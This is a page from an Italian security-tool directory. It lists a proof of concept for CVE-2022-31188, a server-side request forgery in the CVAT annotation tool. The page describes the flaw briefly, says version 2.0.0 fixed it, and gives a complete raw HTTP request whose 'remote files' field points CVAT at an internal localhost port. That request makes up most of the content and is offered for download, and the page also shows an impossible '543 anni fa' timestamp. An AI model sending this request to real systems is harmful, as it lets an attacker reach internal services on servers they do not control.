Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-31188 — CVE-2022-31188 - OpenCV CVAT (Strumento di annotazione della visione artificiale) SSRF | Kitploit
Strumenti/GitHubGitHub/emirpolatt/cve-2022-31188
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubemirpolatt/cve-2022-31188

CVE-2022-31188

CVE-2022-31188 - OpenCV CVAT (Strumento di annotazione della visione artificiale) SSRF

Vedi Repository
543 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-31188

CVE-2022-31188 - OpenCV CVAT (Strumento di annotazione per la visione artificiale) SSRF

CVAT è uno strumento open source di annotazione per la visione artificiale sviluppato da Intel. Qualsiasi utente con autorizzazione "Task Create" può innescare la vulnerabilità SSRF inviando una richiesta HTTP dannosa e ottenendo accesso ad altre porte aperte sul sistema.

La vulnerabilità è stata corretta con l'aggiornamento 2.0.0 di CVAT.

root@kitploit:~
POST /api/v1/tasks/2/data HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/plain, */*
Accept-Language:en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 06d88f739a10c7533991d8010761df721b790b7
X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV
Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436
Content-Length: 569
Origin: http://localhost:8080
Connection: close
Referer:http://localhost:8080/tasks/create
Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="remote files[0]"

http://localhost:8081
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name=" image quality"

170
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use zip chunks"

true
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use cache"

true
-----------------------------251652214142138553464236533436--

Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2022-31188
  • https://github.com/opencv/cvat/security/advisories/GHSA-69qq-p6vh-xjqj

Autore: Emir Polat

Twitter: https://twitter.com/devilsgrins

Scarica lo strumento